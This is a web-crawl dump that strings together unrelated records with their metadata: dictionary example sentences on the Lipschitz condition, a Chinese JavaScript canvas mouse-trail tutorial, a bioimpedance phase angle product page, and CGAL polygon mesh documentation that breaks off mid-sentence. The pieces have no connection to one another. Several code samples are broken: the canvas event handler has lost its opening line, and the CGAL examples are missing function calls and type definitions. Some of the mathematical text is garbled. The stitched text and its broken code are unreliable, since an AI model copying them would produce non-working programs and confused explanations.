REPRODUCIBLE IN ASCII] in (1) satisfies the locally Lipschitz condition.\nwhere 0 [less than or equal to] x < a, 0 [less than or equal to] t < T, B(x, t) > 0 is a constant, [[psi].sub.1] (x), [[psi].sub.2](x) are smooth functions, and f(u,x,t) is a non-linear scour term that satisfies the Lipschitz condition, that is,\nfor any z, w [member of] [B.sub.E], z = w, then we say that h satisfies weighted Lipschitz condition (cf.\nThe nonlinear function [xi](x) is continuously differentiable and satisfies Lipschitz condition with Lipschitz constant [sigma]; that is,\nThen, their first order derivative function [[partial derivative].sub.x] satisfies the Lipschitz condition and there is a number [L.sub.1] [greater than or equalt o] 0 such that\nThe fractional order nonlinear system (12) is globally asymptotically stable, if it satisfies the following conditions: (1) g(x(t)) satisfies g(0) = 0 and the Lipschitz condition with respect to x, that is, [parallel]g([x.sub.1]) - g([x.sub.2])[parallel] [less than or equal to] L[parallel][x.sub.1] - [x.sub.2][parallel]; (2) Re(eig (A)) < 0 and [omega] = -maxRe(eig (A)) > [LM.sub.3][M.sub.4][GAMMA]([alpha]), where [M.sub.3] and [M.sub.4] satisfy [parallel][e.sup.At][parallel] [less than or equal to] [M.sub.3] [e.sup.-[omega]t] and [MATHEMATICAL EXPRESSION NOT REPRODUCIBLE IN ASCII].\nAssume that, for any r(t) = j and r([t.sup.-]) = i, i, j [member of] S, functions [I.sub.j,i] (t, x) satisfy the global Lipschitz condition; that is, there exist constants [L.sub.j,i] i, j [member of] S, such that for arbitrary t [greater than or equal to] [t.sub.0] and arbitrary [x.sub.1], [x.sub.2] [member of] [R.sup.n],\nand f: [-L, L] [right arrow] R satisfy a Lipschitz condition with constant K > 0.\nwhere [phi](t) is a differentiable function, [alpha](t) [member of] [C.sup.1] [0, T] is a strictly monotone increasing function and satisfies that -[tau] [less than or equal to] [alpha](t) [less than or equal to] t and [alpha](0) = -[tau], there exists [t.sub.1] [member of] [0, T] such that [alpha]([t.sub.1]) = 0, and f:D = [0,T] x R x R x R is a given continuous mapping and satisfies the Lipschitz condition\n(i) g(x, t) in (1) and (2) satisfies the Lipschitz condition about state vector x(t); namely, there exists constant [[delta].sub.1] > 0, such that\nGehring and Martio extended HL-result to the class of uniform domains and characterized the domains D with the property that functions which satisfy a local Lipschitz condition in D for some [alpha] always satisfy the corresponding global condition there.\n(A.1) The density function of [[beta].sup.T][x.sub.ij], f(u), is bounded away from zero for u [member of] [U.sub.[omega]] and [beta] near [[beta].sub.0] and satisfies the Lipschitz condition of order 1 on [U.sub.[omega]] where [U.sub.[omega]] is the support of [omega](u).\n\nSite: Follow: Share:\nOpen / Close" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.813572,"math_prob":0.99146706,"size":2877,"snap":"2021-43-2021-49","text_gpt3_token_len":904,"char_repetition_ratio":0.16846502,"word_repetition_ratio":0.03196347,"special_character_ratio":0.305179,"punctuation_ratio":0.18721461,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989822,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T06:54:06Z\",\"WARC-Record-ID\":\"<urn:uuid:fb772982-05a7-4faa-9553-e68ec9c0399f>\",\"Content-Length\":\"47052\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0c0780d1-fbea-47f9-bdf4-c76dd84023a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:1726a0ba-f02e-4838-a6a6-31b88fc7d1ec>\",\"WARC-IP-Address\":\"209.160.67.6\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Lipschitz+Condition\",\"WARC-Payload-Digest\":\"sha1:RVDZWAGMK752OKRVX7A52WO56GMCY7NP\",\"WARC-Block-Digest\":\"sha1:Y6FKWAHYRS7MLQAFINPAXLK6HET6IW67\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587799.46_warc_CC-MAIN-20211026042101-20211026072101-00197.warc.gz\"}"}
http://pdcfighting.com/2022/05/05/canvas%E4%B9%8B%E9%BC%A0%E6%A0%87%E6%BB%91%E5%8A%A8%E7%89%B9%E6%95%88/
[ "# Canvas之鼠标滑动特效", null, "# 什么是 Canvas\n\n<canvas> 是 HTML5 新增的元素,可用于通过使用 JavaScript 中的脚本来绘制图形。例如,它可以用于绘制图形、制作照片、创建动画,甚至可以进行实时视频处理或渲染。\n\n<canvas> 标签允许脚本语言动态渲染位图像。<canvas> 标签创建出了一个可绘制区域,JavaScript 代码可以通过一套完整的绘图功能类似于其他通用二维的 API 访问该区域,从而生成动态的图形。\n\n# 案例-鼠标滑动效果", null, "# 页面搭建\n\n``````<!DOCTYPE html>\n<html lang=\"en\">\n\n<meta charset=\"UTF-8\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n<meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\n<title>Document</title>\n\n<body>\n<canvas id=\"myCanvas\"></canvas>\n</body>\n\n</html>\n``````\n\n``````* {\nmargin: 0;\n}\n\nbody {\noverflow: hidden;\n}\n\n#myCanvas {\nbackground-color: #000; /* 黑色 */\n}\n``````\n\n# 逻辑交互\n\n``````var myCanvas = document.getElementById('myCanvas');\nvar ctx = myCanvas.getContext(\"2d\");\nvar starlist = [];\nfunction init() {\n// 设置canvas区域的范围为整个页面\nmyCanvas.width = window.innerWidth;\nmyCanvas.height = window.innerHeight;\n};\ninit();\n``````\n\n``````window.onresize = init; // 监听屏幕大小改变 重新为canvas大小赋值\n``````\n\n``````// 当鼠标移动时 将鼠标坐标传入构造函数 同时创建一个对象\n// 将对象push到数组中,画出来的彩色小点可以看作每一个对象中记录着信息 然后存在数组中\nstarlist.push(new Star(e.offsetX, e.offsetY));\n});\n``````\n\n``````// 随机函数封装,设置坐标\nfunction random(min, max) {\n// 设置生成随机数公式\nreturn Math.floor((max - min) * Math.random() + min);\n};\n``````\n\n``````// 定义了一个构造函数进行对象构造\nfunction Star(x, y) {\n// 将坐标存在每一个点的对象中\nthis.x = x;\nthis.y = y;\n// 设置随机偏移量\nthis.vx = (Math.random() - 0.5) * 3;\nthis.vy = (Math.random() - 0.5) * 3;\nthis.color = 'rgb(' + random(0, 256) + ',' + random(0, 256) + ',' + random(0, 256) + ')';\nthis.a = 1; // 初始透明度\nthis.draw(); // 把对象绘制到页面\n}\n``````\n\n``````//star对象原型上封装方法\nStar.prototype = {\n// canvas根据数组中存在的每一个对象的小点信息开始画\ndraw: function () {\nctx.beginPath();\nctx.fillStyle = this.color;\n// 图像覆盖 显示方式 lighter 会将覆盖部分的颜色重叠显示出来\nctx.globalCompositeOperation = 'lighter'\nctx.globalAlpha = this.a;\nctx.arc(this.x, this.y, 30, 0, Math.PI * 2, false);\nctx.fill();\nthis.updata();\n},\nupdata() {\n// 根据偏移量更新每一个小点的位置\nthis.x += this.vx;\nthis.y += this.vy;\n// 透明度越来越小\nthis.a *= 0.98;\n}\n}\n\n``````\n\n``````// 将小球渲染到页面上\nfunction render() {\n// 每一次根据改变后数组中的元素进行画圆圈 把原来的内容区域清除掉\nctx.clearRect(0, 0, myCanvas.width, myCanvas.height)\n\n// 根据存在数组中的每一位对象中的信息画圆\nstarlist.forEach(function (ele, i) {\nele.draw();\n// 如果数组中存在透明度小的对象 ,给他去掉 效果展示逐渐消失\nif (ele.a < 0.05) {\nstarlist.splice(i, 1);\n}\n});\nrequestAnimationFrame(render);\n}\nrender();\n``````" ]
[ null, "https://p6.toutiaoimg.com/img/tos-cn-i-qvj2lq49k0/95d67b738cd14888ae379272128ee981~tplv-tt-shrink:640:0.image", null, "https://p3.toutiaoimg.com/img/tos-cn-i-qvj2lq49k0/50034e53e82d42deb53f6326b25a47e1~tplv-tt-shrink:640:0.image", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.8070589,"math_prob":0.9518565,"size":3227,"snap":"2022-05-2022-21","text_gpt3_token_len":1878,"char_repetition_ratio":0.10673286,"word_repetition_ratio":0.042424243,"special_character_ratio":0.27362877,"punctuation_ratio":0.22666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9729137,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T06:06:34Z\",\"WARC-Record-ID\":\"<urn:uuid:d412db4a-ff06-4ee7-8ee2-adc459eea1a6>\",\"Content-Length\":\"82107\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c56103d2-79cc-47ff-b811-3d359c2abb63>\",\"WARC-Concurrent-To\":\"<urn:uuid:5dc9598e-08a1-457b-9d6d-d18b84ec2300>\",\"WARC-IP-Address\":\"82.156.241.96\",\"WARC-Target-URI\":\"http://pdcfighting.com/2022/05/05/canvas%E4%B9%8B%E9%BC%A0%E6%A0%87%E6%BB%91%E5%8A%A8%E7%89%B9%E6%95%88/\",\"WARC-Payload-Digest\":\"sha1:77DXWRWGXUH4WUR6DNTK7DVT5CWQ4I37\",\"WARC-Block-Digest\":\"sha1:TKCVBDYW7AYJTO576AVFODRJZKALA36H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662564830.55_warc_CC-MAIN-20220524045003-20220524075003-00228.warc.gz\"}"}
https://biodyncorp.com/product/450/phase_angle_450.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "phase angle", null, "", null, "", null, "", null, "Phase angle is an indicator of cellular health and integrity.\nResearch in humans has shown that the relationship between phase angle and cellular health is increasing and nearly linear (1,2,3). A low phase angle is consistent with an inability of cells to store energy and an indication of breakdown in the selective permeability of cellular membranes. A high phase angle is consistent with large quantities of intact cell membranes and body cell mass.", null, "Phase angle reflects the ratio of body cell mass to fat-free mass.\nPhase angle is proportional to the ratio of reactance and resistance. Therefore, phase angle is proportional to the ratio of body cell mass to fat-free mass.", null, "What causes the phase angle to increase?", null, "• An increase in body cell mass relative to fat-free mass.", null, "• An increase in fat-free mass relative to body weight.", null, "• Improving hydration of fat-free mass.\n\nPhase angle is useful when comparing individuals.\nReactance along with the patient's weight indicates an absolute amount of body cell mass (BCM). Therefore, reactance is best applied when comparing test results in a single patient at different times. It is possible for two patients with exactly the same reactance (X) to have differing amounts of BCM in kilograms, depending upon the patient's weight.\n\nHowever, since the phase angle indicates a proportion of BCM to FFM, any patient with a higher phase angle will always have a higher proportion of BCM than any other patient with a lower phase angle.\n\nPhase angle does not include the effect of statistical regression.\nLike body cell mass (BCM), the phase angle indicates the number of intact cell membranes. However, phase angle does not include the effect of statistical regression analysis. As a result, phase angle is a direct measurement of relative amounts of intact cellular membranes.\n\nWhat exactly is the phase angle, anyway?\nA bioimpedance analyzer applies a small 50 kilohertz alternating current to the body. If an oscilloscope were connected to the body, the phase angle appears as a small delay between the voltage waveform and the current waveform.\n\nThe period of each wave at 50 kilohertz is 20 microseconds. If, for example, the time delay is ten percent of the period, then the time delay is 2 microseconds. When expressed in units of time, it is said that the phase delay is 2 microseconds.\n\nAnother way of expressing this time delay is as a percentage of the entire wave period in degrees. Each complete wave period consists of 360 degrees. If the time delay is one-tenth the total period of the wave, it is equivalent to 36 degrees. When the time delay is expressed this way (in degrees of the total wave period), it is called the phase angle.", null, "When electrical potential and current are illustrated sweeping around a circle instead of moving over time, the relationship between reactance, resistance, and phase angle is easier to see. This is shown below.", null, "The range of phase angle in the human body is 1 to 20 degrees. The phase angle is the arctangent of (X/R).", null, "References:", null, "", null, "1Kyle UG, et al. Fat-Free and Fat Mass Percentiles in 5225 Healthy Subjects Aged 15 to 98 Years. Nutrition, 17:534-541, 2001.", null, "", null, "", null, "2Mattar J, et al. Application of total body bioimpedance to the critically ill patient. New Horizons 1995, Volume 4, No, 4: 493-503.", null, "", null, "", null, "3Ott M, et al. Bioelectrical impedance analysis as a predictor of survival in patients with human immunodeficiency virus infection. Journal of Acquired Immune Deficiency Syndrome and Human Retrovirology 1995: 9:20-25.", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "copyright © 1998 - biodynamics corporation", null, "", null, "" ]
[ null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/h_measurements_calculations.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/ph_450.jpg", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_top_left.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_top_right.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/gr_phase_cellular.gif", null, "https://biodyncorp.com/images/gr_ratio_xr_phase.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/d_wave_voltage_current02.gif", null, "https://biodyncorp.com/images/d_polar_phase.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_bottom_left.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_bottom_right.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/logo_small_bio.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88897705,"math_prob":0.91247064,"size":3059,"snap":"2021-21-2021-25","text_gpt3_token_len":666,"char_repetition_ratio":0.1492635,"word_repetition_ratio":0.059386972,"special_character_ratio":0.21183394,"punctuation_ratio":0.09666081,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9788677,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,3,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,null,null,null,null,null,null,1,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-12T11:54:07Z\",\"WARC-Record-ID\":\"<urn:uuid:0261c481-7f1c-44e8-b643-b82df153d98e>\",\"Content-Length\":\"16439\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:95813f93-42ff-4e2c-a9f8-55d0e31afdaa>\",\"WARC-Concurrent-To\":\"<urn:uuid:438862bf-d891-4a71-b70f-ab73711a3859>\",\"WARC-IP-Address\":\"35.209.84.254\",\"WARC-Target-URI\":\"https://biodyncorp.com/product/450/phase_angle_450.html\",\"WARC-Payload-Digest\":\"sha1:GVCKNCD7WSJ5ILCRNFTIE6Q2L23LTZIN\",\"WARC-Block-Digest\":\"sha1:2RS5UZVLK5AWFXONC6YVPASGFX5GS5M4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487582767.0_warc_CC-MAIN-20210612103920-20210612133920-00235.warc.gz\"}"}
https://doc.cgal.org/4.12/Polygon_mesh_processing/index.html
[ "", null, "CGAL 4.12 - Polygon Mesh Processing\nUser Manual", null, "# Introduction\n\nThis package implements a collection of methods and classes for polygon mesh processing, ranging from basic operations on simplices, to complex geometry processing algorithms. The implementation of this package mainly follows algorithms and references given in Botsch et al.'s book on polygon mesh processing .\n\n## Polygon Mesh\n\nA polygon mesh is a consistent and orientable surface mesh, that can have one or more boundaries. The faces are simple polygons. The edges are segments. Each edge connects two vertices, and is shared by two faces (including the null face for boundary edges). A polygon mesh can have any number of connected components, and also some self-intersections. In this package, a polygon mesh is considered to have the topology of a 2-manifold.\n\n## API\n\nThis package follows the BGL API described in CGAL and the Boost Graph Library. It can thus be used either with Polyhedron_3, Surface_mesh, or any class model of the concept FaceGraph. Each function or class of this package details the requirements on the input polygon mesh.\n\nNamed Parameters are used to deal with optional parameters. The page Named Parameters for Polygon Mesh Processing describes their usage and provides a list of the parameters that are used in this package.\n\n## Outline\n\nThe algorithms described in this manual are organized in sections:\n\n• Meshing : meshing algorithms, including triangulation of non-triangulated meshes, refinement, optimization by fairing, and isotropic remeshing of triangulated surface meshes.\n• Corefinement and Boolean Operations : methods to corefine triangle meshes and to compute boolean operations out of corefined closed triangle meshes.\n• Hole Filling : available hole filling algorithms, which can possibly be combined with refinement and fairing.\n• Predicates : predicates that can be evaluated on the processed polygon mesh, which includes point location and self intersection tests.\n• Orientation : checking or fixing the Orientation of a polygon soup.\n• Combinatorial Repairing : reparation of polygon meshes and polygon soups.\n• Computing Normals : normal computation at vertices and on faces of a polygon mesh.\n• Slicer : functor able to compute the intersections of a polygon mesh with arbitrary planes (slicer).\n• Connected Components : methods to deal with connected components of a polygon mesh (extraction, marks, removal, ...)\n\n# Meshing\n\nA surface patch can be refined by inserting new vertices and flipping edges to get a triangulation. Using a criterion presented in , the density of triangles near the boundary of the patch is approximated by the refinement function. The validity of the mesh is enforced by flipping edges. An edge is flipped only if the opposite edge does not exist in the original mesh and if no degenerate triangles are generated.\n\nA region of the surface mesh (e.g. the refined region), can be faired to obtain a tangentially continuous and smooth surface patch. The region to be faired is defined as a range of vertices that are relocated. The fairing step minimizes a linear bi-Laplacian system with boundary constraints, described in . The visual results of aforementioned steps are depicted by Figure 60.5 (c and d).\n\n## API\n\n### Meshing\n\nRefinement and fairing functions can be applied to an arbitrary region on a triangle mesh, using :\n\n• CGAL::Polygon_mesh_processing::refine() : given a set of facets on a mesh, refines the region.\n• CGAL::Polygon_mesh_processing::fair() : given a set of vertices on a mesh, fairs the region.\n\nFairing needs a sparse linear solver and we recommend the use of Eigen 3.2 or later. Note that fairing might fail if fixed vertices, which are used as boundary conditions, do not suffice to solve the constructed linear system.\n\nMany algorithms require as input meshes in which all the faces have the same degree, or even are triangles. Hence, one may want to triangulate all polygon faces of a mesh.\n\nThis package provides the function CGAL::Polygon_mesh_processing::triangulate_faces() that triangulates all faces of the input polygon mesh. An approximated support plane is chosen for each face, orthogonal to the normal vector computed by CGAL::Polygon_mesh_processing::compute_face_normal(). Then, the triangulation of each face is the one obtained by building a CGAL::Constrained_Delaunay_triangulation_2 in this plane. This choice is made because the constrained Delaunay triangulation is the triangulation that, given the edges of the face to be triangulated, maximizes the minimum angle of all the angles of the triangles in the triangulation.\n\n### Remeshing\n\nThe incremental triangle-based isotropic remeshing algorithm introduced by Botsch et al , is implemented in this package. This algorithm incrementally performs simple operations such as edge splits, edge collapses, edge flips, and Laplacian smoothing. All the vertices of the remeshed patch are reprojected to the original surface to keep a good approximation of the input.\n\nA triangulated region of a polygon mesh can be remeshed using the function CGAL::Polygon_mesh_processing::isotropic_remeshing(), as illustrated by Figure 60.1. The algorithm has only two parameters : the target edge length for the remeshed surface patch, and the number of iterations of the abovementioned sequence of operations. The bigger this number, the smoother and closer to target edge length the mesh will be.\n\nAn additional option has been added to protect (i.e. not modify) some given polylines. In some cases, those polylines are too long, and reaching the desired target edge length while protecting them is not possible and leads to an infinite loop of edge splits in the incident faces. To avoid that pitfall, the function CGAL::Polygon_mesh_processing::split_long_edges() should be called on the list of constrained edges before remeshing.", null, "Figure 60.1 Isotropic remeshing. (a) Triangulated input surface mesh. (b) Surface uniformly and entirely remeshed. (c) Selection of a range of faces to be remeshed. (d) Surface mesh with the selection uniformly remeshed.\n\n## Meshing Examples\n\n### Refine and Fair a Region on a Triangle Mesh\n\nThe following example calls the functions CGAL::Polygon_mesh_processing::refine() and CGAL::Polygon_mesh_processing::fair() for some selected regions on the input triangle mesh.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Polyhedron_3.h>\n#include <CGAL/Polygon_mesh_processing/refine.h>\n#include <CGAL/Polygon_mesh_processing/fair.h>\n#include <fstream>\n#include <map>\ntypedef CGAL::Polyhedron_3<Kernel> Polyhedron;\ntypedef Polyhedron::Vertex_handle Vertex_handle;\n// extract vertices which are at most k (inclusive)\n// far from vertex v in the graph of edges\nvoid extract_k_ring(Vertex_handle v,\nint k,\nstd::vector<Vertex_handle>& qv)\n{\nstd::map<Vertex_handle, int> D;\nqv.push_back(v);\nD[v] = 0;\nstd::size_t current_index = 0;\nint dist_v;\nwhile (current_index < qv.size() && (dist_v = D[qv[current_index]]) < k)\n{\nv = qv[current_index++];\nPolyhedron::Halfedge_around_vertex_circulator e(v->vertex_begin()), e_end(e);\ndo {\nVertex_handle new_v = e->opposite()->vertex();\nif (D.insert(std::make_pair(new_v, dist_v + 1)).second) {\nqv.push_back(new_v);\n}\n} while (++e != e_end);\n}\n}\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/blobby.off\";\nstd::ifstream input(filename);\nPolyhedron poly;\nif ( !input || !(input >> poly) || poly.empty()\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\nstd::vector<Polyhedron::Facet_handle> new_facets;\nstd::vector<Vertex_handle> new_vertices;\nfaces(poly),\nstd::back_inserter(new_facets),\nstd::back_inserter(new_vertices),\nCGAL::Polygon_mesh_processing::parameters::density_control_factor(2.));\nstd::ofstream refined_off(\"refined.off\");\nrefined_off << poly;\nrefined_off.close();\nstd::cout << \"Refinement added \" << new_vertices.size() << \" vertices.\" << std::endl;\nPolyhedron::Vertex_iterator v = poly.vertices_begin();\nstd::vector<Vertex_handle> region;\nextract_k_ring(v, 12/*e.g.*/, region);\nbool success = CGAL::Polygon_mesh_processing::fair(poly, region);\nstd::cout << \"Fairing : \" << (success ? \"succeeded\" : \"failed\") << std::endl;\nstd::ofstream faired_off(\"faired.off\");\nfaired_off << poly;\nfaired_off.close();\nreturn 0;\n}\n\n### Triangulate a Polygon Mesh\n\nTriangulating a polygon mesh can be achieved through the function CGAL::Polygon_mesh_processing::triangulate_faces() as shown in the following example.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/triangulate_faces.h>\n#include <boost/foreach.hpp>\n#include <fstream>\ntypedef Kernel::Point_3 Point;\ntypedef CGAL::Surface_mesh<Point> Surface_mesh;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/P.off\";\nconst char* outfilename = (argc > 2) ? argv : \"P_tri.off\";\nstd::ifstream input(filename);\nSurface_mesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty())\n{\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\n// Confirm that all faces are triangles.\nBOOST_FOREACH(boost::graph_traits<Surface_mesh>::face_descriptor fit, faces(mesh))\nif (next(next(halfedge(fit, mesh), mesh), mesh)\n!= prev(halfedge(fit, mesh), mesh))\nstd::cerr << \"Error: non-triangular face left in mesh.\" << std::endl;\nstd::ofstream cube_off(outfilename);\ncube_off << mesh;\nreturn 0;\n}\n\n### Isotropic Remeshing of a Region on a Polygon Mesh\n\nThe following example shows a complete example of how the isotropic remeshing function can be used. First, the border of the polygon mesh is collected. Since the boundary edges will be considered as constrained and protected in this example, the function split_long_edges() is called first on these edges.\n\nOnce this is done, remeshing is run on all the surface, with protection of constraints activated, for 3 iterations.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#include <CGAL/Polygon_mesh_processing/border.h>\n#include <boost/function_output_iterator.hpp>\n#include <fstream>\n#include <vector>\ntypedef boost::graph_traits<Mesh>::halfedge_descriptor halfedge_descriptor;\ntypedef boost::graph_traits<Mesh>::edge_descriptor edge_descriptor;\nstruct halfedge2edge\n{\nhalfedge2edge(const Mesh& m, std::vector<edge_descriptor>& edges)\n: m_mesh(m), m_edges(edges)\n{}\nvoid operator()(const halfedge_descriptor& h) const\n{\nm_edges.push_back(edge(h, m_mesh));\n}\nconst Mesh& m_mesh;\nstd::vector<edge_descriptor>& m_edges;\n};\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/pig.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || !CGAL::is_triangle_mesh(mesh)) {\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ndouble target_edge_length = 0.04;\nunsigned int nb_iter = 3;\nstd::cout << \"Split border...\";\nstd::vector<edge_descriptor> border;\nPMP::border_halfedges(faces(mesh),\nmesh,\nboost::make_function_output_iterator(halfedge2edge(mesh, border)));\nPMP::split_long_edges(border, target_edge_length, mesh);\nstd::cout << \"done.\" << std::endl;\nstd::cout << \"Start remeshing of \" << filename\n<< \" (\" << num_faces(mesh) << \" faces)...\" << std::endl;\nfaces(mesh),\ntarget_edge_length,\nmesh,\nPMP::parameters::number_of_iterations(nb_iter)\n.protect_constraints(true)//i.e. protect border, here\n);\nstd::cout << \"Remeshing done.\" << std::endl;\nreturn 0;\n}\n\n# Corefinement and Boolean Operations\n\n## Definitions\n\nCorefinement Given two triangulated surface meshes, the corefinement operation consists in refining both meshes so that their intersection polylines are a subset of edges in both refined meshes.", null, "Figure 60.2 Corefinement of two triangulated surface meshes. (Left) Input meshes; (Right) The two input meshes corefined. The common edges of the two meshes are drawn in green.\n\nVolume bounded by a triangulated surface mesh Given a closed triangulated surface mesh, each connected component splits the 3D space into two subspaces. The vertex sequence of each face of a component is seen either clockwise or counterclockwise from these two subspaces. The subspace that sees the sequence clockwise (resp. counterclockwise) is on the negative (resp. positive) side of the component. Given a closed triangulated surface mesh tm with no self-intersections, the connected components of tm divide the 3D space into subspaces. We say that tm bounds a volume if each subspace lies exclusively on the positive (or negative) side of all the incident connected components of tm. The volume bounded by tm is the union of all subspaces that are on negative sides of their incident connected components of tm.", null, "Figure 60.3 Volumes bounded by a triangulated surface mesh: The figure shows meshes representing three nested spheres (three connected components). The left side of the picture shows a clipped triangulated surface mesh, with the two possible orientations of the faces for which a volume is bounded by the mesh. The positive and negative sides of each connected component is displayed in light and dark blue, respectively. The right part of the picture shows clipped tetrahedral meshes of the corresponding bounded volumes.\n\n## Corefinement\n\nThe corefinement of two triangulated surface meshes can be done using the function CGAL::Polygon_mesh_processing::corefine(). It takes as input the two triangulated surface meshes to corefine. If constrained edge maps are provided, edges belonging to the intersection of the input meshes will be marked as constrained. In addition, if an edge that was marked as constrained is split during the corefinement, sub-edges will be marked as constrained as well.\n\n## Boolean Operations", null, "Figure 60.4 Let C and S be the volumes bounded by the triangulated surface meshes of a cube and a sphere, respectively. From left to right, the picture shows the triangulated surface meshes bounding the union of C and S, C minus S, the intersection of C and S and S minus C.\n\nThe corefinement of two triangulated surface meshes can naturally be used for computing Boolean operations on volumes. Considering two triangulated surface meshes, each bounding a volume, the functions CGAL::Polygon_mesh_processing::corefine_and_compute_union(), CGAL::Polygon_mesh_processing::corefine_and_compute_intersection() and CGAL::Polygon_mesh_processing::corefine_and_compute_difference() respectively compute the union, the intersection and the difference of the two volumes. Note that there is no restriction on the topology of the input volumes.\n\nHowever, there are some requirements on the input to guarantee that the operation is possible. First, the input meshes must not self-intersect. Second, the operation is possible only if the output can be bounded by a manifold triangulated surface mesh. In particular this means that the output volume has no part with zero thickness. Mathematically speaking, the intersection with an infinitesimally small ball centered in the output volume is a topological ball. At the surface level this means that no non-manifold vertex or edge is allowed in the output. For example, it is not possible to compute the union of two cubes that are disjoint but sharing an edge. In case you have to deal with such scenarios, you should consider using the package 3D Boolean Operations on Nef Polyhedra.\n\nIt is possible to update the input so that it contains the result (in-place operation). In that case the whole mesh will not be copied and only the region around the intersection polyline will be modified. In case the Boolean operation is not possible, the input mesh will nevertheless be corefined.\n\n## Kernel and Validity of the Output\n\nThe corefinement operation (which is also internally used in the three Boolean operations) will correctly change the topology of the input surface mesh if the point type used in the point property maps of the input meshes is from a CGAL Kernel with exact predicates. If that kernel does not have exact constructions, the embedding of the output surface mesh might have self-intersections. In case of consecutive operations, it is thus recommended to use a point property map with points from a kernel with exact predicates and exact constructions (such as CGAL::Exact_predicates_exact_constructions_kernel).\n\nIn practice, this means that with exact predicates and inexact constructions, edges will be split at each intersection with a triangle but the position of the intersection point might create self-intersections due to the limited precision of floating point 